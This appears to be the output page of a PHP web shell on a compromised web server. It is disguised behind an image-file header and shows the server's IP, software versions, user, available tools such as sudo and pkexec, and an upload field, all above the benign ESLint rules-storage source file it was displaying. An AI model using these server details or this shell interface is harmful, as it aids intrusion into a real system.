????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.217.150.104 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/forge/node_modules/eslint/lib/ |
Upload File : |
/** * @fileoverview Defines a storage for rules. * @author Nicholas C. Zakas */ "use strict"; //------------------------------------------------------------------------------ // Requirements //------------------------------------------------------------------------------ const lodash = require("lodash"); const ruleReplacements = require("../conf/replacements").rules; const builtInRules = require("./built-in-rules-index"); //------------------------------------------------------------------------------ // Helpers //------------------------------------------------------------------------------ /** * Creates a stub rule that gets used when a rule with a given ID is not found. * @param {string} ruleId The ID of the missing rule * @returns {{create: function(RuleContext): Object}} A rule that reports an error at the first location * in the program. The report has the message `Definition for rule '${ruleId}' was not found` if the rule is unknown, * or `Rule '${ruleId}' was removed and replaced by: ${replacements.join(", ")}` if the rule is known to have been * replaced. */ const createMissingRule = lodash.memoize(ruleId => { const message = Object.prototype.hasOwnProperty.call(ruleReplacements, ruleId) ? `Rule '${ruleId}' was removed and replaced by: ${ruleReplacements[ruleId].join(", ")}` : `Definition for rule '${ruleId}' was not found`; return { create: context => ({ Program() { context.report({ loc: { line: 1, column: 0 }, message }); } }) }; }); /** * Normalizes a rule module to the new-style API * @param {(Function|{create: Function})} rule A rule object, which can either be a function * ("old-style") or an object with a `create` method ("new-style") * @returns {{create: Function}} A new-style rule. */ function normalizeRule(rule) { return typeof rule === "function" ? Object.assign({ create: rule }, rule) : rule; } //------------------------------------------------------------------------------ // Public Interface //------------------------------------------------------------------------------ class Rules { constructor() { this._rules = Object.create(null); Object.keys(builtInRules).forEach(ruleId => { this.define(ruleId, builtInRules[ruleId]); }); } /** * Registers a rule module for rule id in storage. * @param {string} ruleId Rule id (file name). * @param {Function} ruleModule Rule handler. * @returns {void} */ define(ruleId, ruleModule) { this._rules[ruleId] = normalizeRule(ruleModule); } /** * Access rule handler by id (file name). * @param {string} ruleId Rule id (file name). * @returns {{create: Function, schema: JsonSchema[]}} * A rule. This is normalized to always have the new-style shape with a `create` method. */ get(ruleId) { if (!Object.prototype.hasOwnProperty.call(this._rules, ruleId)) { return createMissingRule(ruleId); } if (typeof this._rules[ruleId] === "string") { return normalizeRule(require(this._rules[ruleId])); } return this._rules[ruleId]; } /** * Get an object with all currently loaded rules * @returns {Map} All loaded rules */ getAllLoadedRules() { const allRules = new Map(); Object.keys(this._rules).forEach(name => { const rule = this.get(name); allRules.set(name, rule); }); return allRules; } } module.exports = Rules;